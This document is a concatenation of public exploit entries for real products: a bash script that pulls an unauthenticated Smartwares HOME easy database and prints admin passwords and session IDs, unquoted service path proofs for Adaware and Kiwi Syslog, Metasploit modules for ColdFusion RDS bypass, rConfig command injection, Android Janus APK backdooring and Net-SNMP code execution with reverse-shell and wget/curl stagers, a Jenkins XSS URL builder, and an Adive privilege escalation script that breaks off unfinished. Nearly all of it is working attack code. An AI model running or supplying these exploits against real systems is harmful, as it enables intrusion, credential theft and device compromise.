#!/bin/bash
#
#
# Smartwares HOME easy v1.0.9 Database Backup Information Disclosure Exploit
#
#
# Vendor: Smartwares
# Product web page: https://www.smartwares.eu
# Affected version: <=1.0.9
#
# Summary: Home Easy/Smartwares are a range of products designed to remotely
# control your home using wireless technology. Home Easy/Smartwares is very
# simple to set up and allows you to operate your electrical equipment like
# lighting, appliances, heating etc.
#
# Desc: The home automation solution is vulnerable to unauthenticated database
# backup download and information disclosure vulnerability. This can enable the
# attacker to disclose sensitive and clear-text information resulting in authentication
# bypass, session hijacking and full system control.
#
# ==============================================================================
# root@kali:~/homeeasy# ./he_info.sh http://192.168.1.177:8004
# Target: http://192.168.1.177:8004
# Filename: 192.168.1.177:8004-16072019-db.sqlite
# Username: admin
# Password: s3cr3tP4ssw0rd
# Version: 1.0.9
# Sessions: 
# ------------------------------------------------------------------
# * Ft5Mkgr5i9ywVrRH4mAECSaNJkTp5oiC0fpbuIgDIFbE83f3hGGKzIyb3krXHBsy
# * Gcea4Ald4PlVGkOh23mIohGq2Da6h4mX0A8ibkm7by3QSI8TLmuaubrvGABWvWMJ
# * JFU4zpdhuN4RTYgvvAhKQKqnQSvc8MAJ0nMTLYb8F6YzV7WjHe4qYlMH6aSdOlN9
# * VtOqw37a12jPdJH3hJ5E9qrc3I4YY1aU0PmIRkSJecAqMak4TpzTORWIs1zsRInd
# * flR4VjFmDBSiaTmXSYQxf4CdtMT3OQxV0pQ1zwfe98niSI9LIYcO3F2nsUpiDVeH
# * rCfrAvnfnl6BsLjF9FjBoNgPgvqSptcH0i9yMwN3QSDbwNHwu19ROoAVSROamRRk
# ------------------------------------------------------------------
# ==============================================================================
#
# Tested on: Boa/0.94.13
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - https://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2019-5541
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5541.php
#
#
# 30.09.2019
#
#


if [ "$#" -ne 1 ]; then
    echo "Usage: $0 http://ip:port"
    exit 0
fi
TARGET=$1
CHECK=$(curl -Is $TARGET/data.dat 2>/dev/null | head -1 | awk -F""'{print $2}')
if [[ "$?" = "7" ]] || [[ $CHECK != "200" ]]; then
    echo "No juice."
    exit 1
fi
echo "Target: "$TARGET
FNAME=${TARGET:7}-$(date +"%d%m%Y")
curl -s $TARGET/data.dat -o $FNAME-db.sqlite
echo "Filename: $FNAME-db.sqlite"
echo "Username: "$(sqlite3 $FNAME-db.sqlite "select usrname from usr") # default: admin
echo "Password: "$(sqlite3 $FNAME-db.sqlite "select usrpassword from usr") # default: 111111
echo "Version: "$(sqlite3 $FNAME-db.sqlite "select option_value1 from option LIMIT 1 OFFSET 3")
echo -ne "Sessions: \n"
printf "%0.s-" {1..66}
printf "\n"
sqlite3 $FNAME-db.sqlite "select sessionid from sessiontable" | xargs -L1 echo "*"
printf "%0.s-" {1..66} ; printf "\n\n"

# Exploit Title: Adaware Web Companion version 4.8.2078.3950 - 'WCAssistantService' Unquoted Service Path
# Date: 2019-11-06
# Exploit Author: Mariela L Martínez Hdez
# Vendor Homepage: https://webcompanion.com/en/
# Software Link: https://webcompanion.com/en/
# Version: Adaware Web Companion version 4.8.2078.3950
# Tested on: Windows 10 Home (64 bits)

# 1. Description
# Adaware Web Companion version 4.8.2078.3950 service 'WCAssistantService' has an unquoted service path.

# 2. PoC

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """"

WC Assistant        WCAssistantService        C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe     Auto

C:\>sc qc WCAssistantService
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: WCAssistantService
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : WC Assistant
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem



# 3. Exploit
# A successful attempt would require the local user to be able to insert their code in the system 
# root path undetected by the OS or othersecurity applications where it could potentially be executed 
# during application startup or reboot. If successful, the local user's code would execute with 
# the elevated privileges of the application.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Module::Deprecated

  moved_from 'exploit/multi/http/coldfusion_rds'

  Rank = GreatRanking

  def initialize(info = {})
    super(update_info(info,
'Name'            => 'Adobe ColdFusion RDS Authentication Bypass',
'Description'     => %q{
        Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote
        attackers to bypass authentication using the RDS component. Due to
        default settings or misconfiguration, its password can be set to an
        empty value. This allows an attacker to create a session via the RDS
        login that can be carried over to the admin web interface even though
        the passwords might be different, and therefore bypassing authentication
        on the admin web interface leading to arbitrary code execution. Tested
        on Windows and Linux with ColdFusion 9.
      },
'Author'          =>
        [
'Scott Buckel', # Vulnerability discovery
'Mekanismen <mattias[at]gotroot.eu>' # Metasploit module
        ],
'License'         => MSF_LICENSE,
'References'      =>
        [
          [ "CVE", "2013-0632" ],
          [ "EDB", "27755" ],
          [ "URL", "http://www.adobe.com/support/security/bulletins/apsb13-03.html" ]
        ],
'Privileged'      => false,
'Stance'          => Msf::Exploit::Stance::Aggressive, #thanks juan!
'Platform'        => ['win', 'linux'],
'Targets'         =>
        [
         [ 'Windows',
            {
'Arch' => ARCH_X86,
'Platform' => 'win'
            }
          ],
          [ 'Linux',
            {
'Arch' => ARCH_X86,
'Platform' => 'linux'
            }
          ],
        ],
'DefaultTarget'   => 0,
'DisclosureDate'  => 'Aug 08 2013'
    ))

    register_options(
      [
        OptString.new('EXTURL', [ false, 'An alternative host to request the CFML payload from', "" ]),
        OptInt.new('HTTPDELAY', [false, 'Time that the HTTP Server will wait for the payload request', 10]),
      ])

    register_advanced_options(
      [
        OptString.new('CFIDDIR', [ true, 'Alternative CFIDE directory', 'CFIDE'])
      ])
  end

  def check
    uri = target_uri.path

    #can we access the admin interface?
    res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'index.cfm'),
    })

    if res && res.code == 200 && res.body.include?('ColdFusion Administrator Login')
       vprint_good "Administrator access available"
    else
      return Exploit::CheckCode::Safe
    end

    #is it cf9?
    res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'images', 'loginbackground.jpg')
    })

    img = Rex::Text.md5(res.body.to_s)
    imghash = "596b3fc4f1a0b818979db1cf94a82220"

    if img == imghash
      vprint_good "ColdFusion 9 Detected"
    else
      return Exploit::CheckCode::Safe
    end

    #can we access the RDS component?
    res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'adminapi', 'administrator.cfc'),
'vars_post' => {
'method' => "login",
'adminpassword' => "",
'rdsPasswordAllowed' => "1"
       }
    })

    if res && res.code == 200 && res.body.include?('true')
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    @pl           = gen_file_dropper
    @payload_url  = ""

    if datastore['EXTURL'].blank?
      begin
        Timeout.timeout(datastore['HTTPDELAY']) {super}
      rescue Timeout::Error
      end
      exec_payload
    else
      @payload_url = datastore['EXTURL']
      upload_payload
      exec_payload
    end
  end

  def primer
    @payload_url = get_uri
    upload_payload
  end

  def on_request_uri(cli, request)
    if request.uri =~ /#{get_resource}/
      send_response(cli, @pl)
    end
  end

  def autofilter
    true
  end

  #task scheduler is pretty bad at handling binary files and likes to mess up our meterpreter :-(
  #instead we use a CFML filedropper to embed our payload and execute it.
  #this also removes the dependancy of using the probe.cfm to execute the file.

  def gen_file_dropper
    rand_var    = rand_text_alpha(8+rand(8))
    rand_file   = rand_text_alpha(8+rand(8))

    if datastore['TARGET'] == 0
      rand_file += ".exe"
    end

    encoded_pl  = Rex::Text.encode_base64(generate_payload_exe)

    print_status "Building CFML shell..."
    #embed payload
    shell = ""
    shell += "<cfset #{rand_var} = ToBinary( \"#{encoded_pl}\" ) />"
    shell += "<cffile action=\"write\" output=\"##{rand_var}#\""
    shell += " file= \"#GetDirectoryFromPath(GetCurrentTemplatePath())##{rand_file}\""
    #if linux set correct permissions
    if datastore['TARGET'] == 1
      shell += " mode = \"700\""
    end
    shell += "/>"
    #clean up our evil .cfm
    shell += "<cffile action=\"delete\""
    shell += " file= \"#GetDirectoryFromPath(GetCurrentTemplatePath())##listlast(cgi.script_name,\"/\")#\"/>"
    #execute our payload!
    shell += "<cfexecute"
    shell += " name = \"#GetDirectoryFromPath(GetCurrentTemplatePath())##{rand_file}\""
    shell += " arguments = \"\""
    shell += " timeout = \"60\"/>"

    return shell
  end

  def exec_payload
    uri = target_uri.path

    print_status("Our payload is at: #{peer}\\#{datastore['CFIDDIR']}\\#{@filename}")
    print_status("Executing payload...")

    res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], @filename)
    })
  end

  def upload_payload
    uri = target_uri.path

    @filename = rand_text_alpha(8+rand(8)) + ".cfm" #numbers is a bad idea
    taskname = rand_text_alpha(8+rand(8)) #numbers is a bad idea

    print_status "Trying to upload payload via scheduled task..."
    res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'adminapi', 'administrator.cfc'),
'vars_post' => {
'method' => "login",
'adminpassword' => "",
'rdsPasswordAllowed' => "1"
       }
    })

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - RDS component was unreachable")
    end

    #deal with annoying cookie data prepending (sunglasses)
    cookie = res.get_cookies

    if res && res.code == 200 && cookie =~ /CFAUTHORIZATION_cfadmin=;(.*)/
      cookie = $1
    else
      fail_with(Failure::Unknown, "#{peer} - Unable to get auth cookie")
    end

    res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'index.cfm'),
'cookie' => cookie
    })

    if res && res.code == 200 && res.body.include?('ColdFusion Administrator')
      print_good("Logged in as Administrator!")
    else
      fail_with(Failure::Unknown, "#{peer} - Login Failed")
    end

    #get file path gogo
    res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'settings', 'mappings.cfm'),
'vars_get' => {
'name' => "/CFIDE"
      },
'cookie' => cookie
    })

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Mappings URL was unreachable")
    end

    if res.body =~ /<input type="text" maxlength="550" name="directoryPath" value="(.*)" size="40" id="dirpath">/
      file_path = $1
      print_good("File path disclosed! #{file_path}")
    else
      fail_with(Failure::Unknown, "#{peer} - Unable to get upload filepath")
    end

    print_status("Adding scheduled task")
    res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduleedit.cfm'),
'vars_post' => {
'TaskName' => taskname,
'Start_Date' => "Nov 1, 2420",
'End_Date' => "",
'Interval' => "",
'ScheduleType' => "Once",
'Operation' => "HTTPRequest",
'ScheduledURL' => @payload_url,
'publish' => "1",
'publish_file' => "#{file_path}\\#{@filename}",
'adminsubmit' => "Submit"
      },
'cookie' => cookie
    })

    unless res && res.code == 200 || res.code == 302 #302s can happen but it still works, http black magic!
      fail_with(Failure::Unknown, "#{peer} - Scheduled task failed")
    end

    print_status("Running scheduled task")
    res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'),
'vars_get' => {
'runtask' => taskname,
'timeout' => "0"
      },
'cookie' => cookie
      })

    if res && res.code == 200 && res.body.include?('This scheduled task was completed successfully')
      print_good("Scheduled task completed successfully")
    else
      fail_with(Failure::Unknown, "#{peer} - Scheduled task failed")
    end

    print_status("Deleting scheduled task")
    res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'),
'vars_get' => {
'action' => "delete",
'task' => taskname
      },
'cookie' => cookie
    })

    unless res && res.code == 200
      print_error("Scheduled task deletion failed, cleanup might be needed!")
    end
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'rConfig install Command Execution',
'Description'    => %q{
        This module exploits an unauthenticated command injection vulnerability
        in rConfig versions 3.9.2 and prior. The `install` directory is not
        automatically removed after installation, allowing unauthenticated users
        to execute arbitrary commands via the `ajaxServerSettingsChk.php` file
        as the web server user.

        This module has been tested successfully on rConfig version 3.9.2 on
        CentOS 7.7.1908 (x64).
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'mhaskar', # Discovery and exploit
'bcoles'   # Metasploit
        ],
'References'     =>
        [
          ['CVE', '2019-16662'],
          ['EDB', '47555'],
          ['URL', 'https://gist.github.com/mhaskar/ceb65fa4ca57c3cdccc1edfe2390902e'],
          ['URL', 'https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/']
        ],
'Platform'       => %w[unix linux],
'Arch'           => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Payload'        => {'BadChars' => "\x00\x0a\x0d\x26"},
'Targets'        =>
        [
          ['Automatic (Unix In-Memory)',
'Platform'       => 'unix',
'Arch'           => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
'Type'           => :unix_memory
          ],
          ['Automatic (Linux Dropper)',
'Platform'       => 'linux',
'Arch'           => [ARCH_X86, ARCH_X64],
'DefaultOptions' => {'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'},
'Type'           => :linux_dropper
          ]
        ],
'Privileged'     => false,
'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 },
'DisclosureDate' => '2019-10-28',
'DefaultTarget'  => 0))
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to rConfig install directory', '/install/'])
      ])
  end

  def check
    res = execute_command('id')

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    if res.code == 404
      vprint_error 'Could not find install directory'
      return CheckCode::Safe
    end

    cmd_res = res.body.scan(%r{The root details provided have not passed: (.+?)<\\/}).flatten.first

    unless cmd_res
      return CheckCode::Safe
    end

    vprint_status "Response: #{cmd_res}"

    unless cmd_res.include?('uid=')
      return CheckCode::Detected
    end

    CheckCode::Vulnerable
  end

  def execute_command(cmd, opts = {})
    vprint_status "Executing command: #{cmd}"
    send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxServerSettingsChk.php'),
'vars_get' => {'rootUname' => ";#{cmd} #"}
    }, 5)
  end

  def exploit
    unless [CheckCode::Detected, CheckCode::Vulnerable].include? check
      fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
    end

    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager(:linemax => 1_500)
    end
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/payload/apk'

class MetasploitModule < Msf::Exploit::Local
  Rank = ManualRanking

  include Msf::Exploit::FileDropper
  include Msf::Post::File
  include Msf::Post::Android::Priv
  include Msf::Payload::Android

  def initialize(info={})
    super( update_info( info, {
'Name'           => "Android Janus APK Signature bypass",
'Description'    => %q{
        This module exploits CVE-2017-13156 in Android to install a payload into another
        application. The payload APK will have the same signature and can be installed
        as an update, preserving the existing data.
        The vulnerability was fixed in the 5th December 2017 security patch, and was
        additionally fixed by the APK Signature scheme v2, so only APKs signed with
        the v1 scheme are vulnerable.
        Payload handler is disabled, and a multi/handler must be started first.
      },
'Author'         => [
'GuardSquare', # discovery
'V-E-O',       # proof of concept
'timwr',       # metasploit module
'h00die',      # metasploit module
      ],
'References'     => [
        [ 'CVE', '2017-13156' ],
        [ 'URL', 'https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures' ],
        [ 'URL', 'https://github.com/V-E-O/PoC/tree/master/CVE-2017-13156' ],
      ],
'DisclosureDate' => 'Jul 31 2017',
'SessionTypes'   => [ 'meterpreter' ],
'Platform'       => [ 'android' ],
'Arch'           => [ ARCH_DALVIK ],
'Targets'        => [ [ 'Automatic', {} ] ],
'DefaultOptions' => {
'PAYLOAD' => 'android/meterpreter/reverse_tcp',
'AndroidWakelock' => false, # the target may not have the WAKE_LOCK permission
'DisablePayloadHandler' => true,
      },
'DefaultTarget'  => 0,
'Notes' => {
'SideEffects' => ['ARTIFACTS_ON_DISK', 'SCREEN_EFFECTS'],
'Stability' => ['SERVICE_RESOURCE_LOSS'], # ZTE youtube app won't start anymore
      }
    }))
    register_options([
      OptString.new('PACKAGE', [true, 'The package to target, or ALL to attempt all', 'com.phonegap.camerasample']),
    ])
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
    ]
  end

  def check
    os = cmd_exec("getprop ro.build.version.release")
    unless Gem::Version.new(os).between?(Gem::Version.new('5.1.1'), Gem::Version.new('8.0.0'))
      vprint_error "Android version #{os} is not vulnerable."
      return CheckCode::Safe
    end
    vprint_good "Android version #{os} appears to be vulnerable."

    patch = cmd_exec('getprop ro.build.version.security_patch')
    if patch.empty?
      print_status 'Unable to determine patch level.  Pre-5.0 this is unaccessible.'
    elsif patch > '2017-12-05'
      vprint_error "Android security patch level #{patch} is patched."
      return CheckCode::Safe
    else
      vprint_good "Android security patch level #{patch} is vulnerable"
    end

    CheckCode::Appears
  end

  def exploit

    def infect(apkfile)
      unless apkfile.start_with?("package:")
        fail_with Failure::BadConfig, 'Unable to locate app apk'
      end
      apkfile = apkfile[8..-1]
      print_status "Downloading APK: #{apkfile}"
      apk_data = read_file(apkfile)

      begin
        # Create an apk with the payload injected
        apk_backdoor = ::Msf::Payload::Apk.new
        apk_zip = apk_backdoor.backdoor_apk(nil, payload.encoded, false, false, apk_data, false)

        # Extract the classes.dex
        dex_data = ''
        Zip::File.open_buffer(apk_zip) do |zipfile|
          dex_data = zipfile.read("classes.dex")
        end
        dex_size = dex_data.length

        # Fix the original APKs zip file code directory
        cd_end_addr = apk_data.rindex("\x50\x4b\x05\x06")
        cd_start_addr = apk_data[cd_end_addr+16, cd_end_addr+20].unpack("V")[0]
        apk_data[cd_end_addr+16...cd_end_addr+20] = [ cd_start_addr+dex_size ].pack("V")
        pos = cd_start_addr
        while pos && pos < cd_end_addr
          offset = apk_data[pos+42, pos+46].unpack("V")[0]
          apk_data[pos+42...pos+46] = [ offset+dex_size ].pack("V")
          pos = apk_data.index("\x50\x4b\x01\x02", pos+46)
        end

        # Prepend the new classes.dex to the apk
        out_data = dex_data + apk_data
        out_data[32...36] = [ out_data.length ].pack("V")
        out_data = fix_dex_header(out_data)

        out_apk = "/sdcard/#{Rex::Text.rand_text_alphanumeric 6}.apk"
        print_status "Uploading APK: #{out_apk}"
        write_file(out_apk, out_data)
        register_file_for_cleanup(out_apk)
        print_status "APK uploaded"

        # Prompt the user to update the APK
        session.appapi.app_install(out_apk)
        print_status "User should now have a prompt to install an updated version of the app"
        true
      rescue => e
        print_error e.to_s
        false
      end
    end

    unless [CheckCode::Detected, CheckCode::Appears].include? check
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if datastore["PACKAGE"] == 'ALL'
      vprint_status('Finding installed packages (this can take a few minutes depending on list of installed packages)')
      apkfiles = []
      all = cmd_exec("pm list packages").split("\n")
      c = 1
      all.each do |package|
        package = package.split(':')[1]
        vprint_status("Attempting exploit of apk #{c}/#{all.length} for #{package}")
        c += 1
        next if ['com.metasploit.stage', # avoid injecting into ourself
                ].include? package # This was left on purpose to be expanded as need be for testing
        result = infect(cmd_exec("pm path #{package}"))
        break if result
      end
    else
      infect(cmd_exec("pm path #{datastore["PACKAGE"]}"))
    end
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'snmp'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::SNMPClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
'Name'           => 'Net-SNMPd Write Access SNMP-EXTEND-MIB arbitrary code execution',
'Description'    => %q(
            This exploit module exploits the SNMP write access configuration ability of SNMP-EXTEND-MIB to
            configure MIB extensions and lead to remote code execution.
        ),
'License'        => MSF_LICENSE,
'Author'         => ['Steve Embling at InteliSecure'],
'References'     =>
          [
            [ 'URL', 'http://net-snmp.sourceforge.net/docs/mibs/NET-SNMP-EXTEND-MIB.txt'],
            [ 'URL', 'https://medium.com/rangeforce/snmp-arbitrary-command-execution-19a6088c888e'],
            [ 'URL', 'https://digi.ninja/blog/snmp_to_shell.php'],
            [ 'URL', 'https://sourceforge.net/p/net-snmp/mailman/message/15735617/']
          ],
'Payload'        =>
          {
'Space'    => 4096
            #note space above is not a hard limit and can be increased if required
            #'BadChars' => "\x00"
          },
'Targets'        =>
        [
          ['Linux x86', {
'Arch' => ARCH_X86,
'Platform' => 'linux',
'CmdStagerFlavor' => [ :echo, :printf, :bourne, :wget, :curl ]}],
          ['Linux x64', {
'Arch' => ARCH_X64,
'Platform' => 'linux',
'CmdStagerFlavor' => [ :echo, :printf, :bourne, :wget, :curl ]}]
          ],
          #Not tested on other platforms but confirmed the above works.
'DisclosureDate' => "May 10 2004",
'DefaultTarget'  => 0,
      )
    )
    register_options(
      [
        OptString.new('FILEPATH', [true, 'file path to write to ', '/tmp']),
        OptString.new('CHUNKSIZE', [true, 'Maximum bytes of payload to write at once ', 200]),
        OptString.new('SHELL', [true, 'Shell to call with -c argument', '/bin/bash'])
      ])
  end

  # The exploit method connects and sets:
  # NET-SNMP-EXTEND-MIB::nsExtendStatus."tmp" = INTEGER: createAndGo(4)
  # NET-SNMP-EXTEND-MIB::nsExtendCommand."tmp" = STRING: /path/to/executable
  # NET-SNMP-EXTEND-MIB::nsExtendArgs."tmp" = STRING: arguments
  def execute_command(cmd, opts = {})
    oid_1 = '1.3.6.1.4.1.8072.1.3.2.2.1.21.3.116.109.112'
    oid_1_value = 4
    oid_2 = '1.3.6.1.4.1.8072.1.3.2.2.1.2.3.116.109.112'
    oid_2_value =  datastore['SHELL']
    oid_3 = '1.3.6.1.4.1.8072.1.3.2.2.1.3.3.116.109.112'
    oid_4 = '1.3.6.1.4.1.8072.1.3.2.4.1.2.3.116.109.112.1'

    comm = datastore['COMMUNITY']

    cmd = cmd.shellescape unless flavor == :bourne

    oid_3_value = "-c \"#{cmd}\""

    vprint_status(oid_3_value)
    SNMP::Manager.open(:Host => rhost, :Port => rport, :Community => comm) do |manager|
      #vprint_status(manager.get_value("sysDescr.0"))
      varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))
      varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))
      varbind3 = SNMP::VarBind.new(oid_3,SNMP::OctetString.new(oid_3_value))
      resp = manager.set([varbind1, varbind2, varbind3])
      vprint_status(manager.get_value(oid_4).to_s)
    end
    #Hit same again, first rewrite  appears to remove the MIB, the next reinstates it.
    SNMP::Manager.open(:Host => rhost, :Port => rport, :Community => comm) do |manager|
      varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))
      varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))
      varbind3 = SNMP::VarBind.new(oid_3,SNMP::OctetString.new(oid_3_value))
      begin
        resp = manager.set([varbind1, varbind2, varbind3])
        vprint_status(manager.get_value(oid_4).to_s)
      rescue SNMP::RequestTimeout
        print_good("SNMP request timeout (this is promising).")
      end
    end
  end

  def exploit
    execute_cmdstager(linemax: datastore['CHUNKSIZE'].to_i, :temp => datastore['FILEPATH'])
  end
end

# Exploit Title: Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting
# Date: 2019-11-06
# Exploit Author: vesche (Austin Jackson)
# Vendor Homepage: https://plugins.jenkins.io/build-metrics
# Version: Jenkins build-metrics plugin 1.3 and below
# Tested on: Debian 10 (Buster), Jenkins 2.203 (latest 2019-11-05), and build-metrics 1.3
# CVE: CVE-2019-10475
# Write-up: https://github.com/vesche/CVE-2019-10475

#!/usr/bin/env python

import sys
import argparse

VULN_URL = '''{base_url}/plugin/build-metrics/getBuildStats?label={inject}&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search'''


def get_parser():
    parser = argparse.ArgumentParser(description='CVE-2019-10475')
    parser.add_argument('-p', '--port', help='port', default=80, type=int)
    parser.add_argument('-d', '--domain', help='domain', default='localhost', type=str)
    parser.add_argument('-i', '--inject', help='inject', default='<script>alert("CVE-2019-10475")</script>', type=str)
    return parser


def main():
    parser = get_parser()
    args = vars(parser.parse_args())
    port = args['port']
    domain = args['domain']
    inject = args['inject']
    if port == 80:
        base_url = f'http://{domain}'
    elif port == 443:
        base_url = f'https://{domain}'
    else:
        base_url = f'http://{domain}:{port}'
    build_url = VULN_URL.format(base_url=base_url, inject=inject)
    print(build_url)
    return 0


if __name__ == '__main__':
    sys.exit(main())

# Exploit Title: SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path
# Date: 2019-11-08
# Exploit Author: Carlos A Garcia R
# Vendor Homepage: https://www.kiwisyslog.com/
# Software Link: https://www.kiwisyslog.com/downloads
# Version: 8.3.52
# Tested on: Windows XP Professional Service Pack 3

# Description:
# SolarWinds Kiwi Syslog Server 8.3.52 is an affordable software to manage syslog messages, SNMP traps, and Windows event logs

# PoC:

# C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

Kiwi Syslog Server  Kiwi Syslog Server  C:\Archivos de programa\Syslogd\Syslogd_Service.exe  Auto

# C:\>sc qc "Kiwi Syslog Server"
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: Kiwi Syslog Server
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Archivos de programa\Syslogd\Syslogd_Service.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Kiwi Syslog Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem


# Exploit
Using the BINARY_PATH_NAME listed above, an executable named "Archivos.exe"
could be placed in "C:\", and it would be executed as the Local System user 
next time the service was restarted.

# Exploit Title: Adive Framework 2.0.7 - Privilege Escalation
# Date: 2019-08-02
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.adive.es/
# Software Link: https://github.com/ferdinandmartin/adive-php7
# Version: 2.0.7
# Tested on: Windows 10
# CVE : CVE-2019-14347

#Exploit

import requests
import sys

session = requests.Session()

http_proxy  = "http://127.0.0.1:8080"
https_proxy = "https://127.0.0.1:8080"

proxyDict = {
"http"  : http_proxy,
"https" : https_proxy
           }
print('[*****************************************]')
print('[ BYPASSING Adive Framework Version.2.0.5 ]')
print('[*****************************************]''\n')



print('[+]Login with the correct credentials:''\n')

user = input('[+]user:')
password = input('[+]password:')
print('\n')

url = 'http://localhost/adive/admin/login'
values = {'user': user,
'password': password,
          }

r = session.post(url, data=values, proxies=proxyDict)
cookie = session.cookies.get_dict()['PHPSESSID']

print('Your session cookie is:'+ cookie +'\n')


host = sys.argv[1]
print('Create the new user:')
userName = input('[+]User:')
userUsername = input('[+]UserName:')
password = input('[+]Password:')
password2 = input('[+]Confirm Password:')
print('The possibles permission are: 1: Administrator, 2: Developer, 3:Editor')
permission = input('[+]permission:')

if (password == password2):
#configure proxy burp

#hacer el request para la creacion de usuario
data = {
'userName':userName,
'userUsername':userUsername,
'pass':password,
'cpass':password2,
'permission':permission,

}

headers= {
'Cookie': 'PHPSESSID='+cookie
}

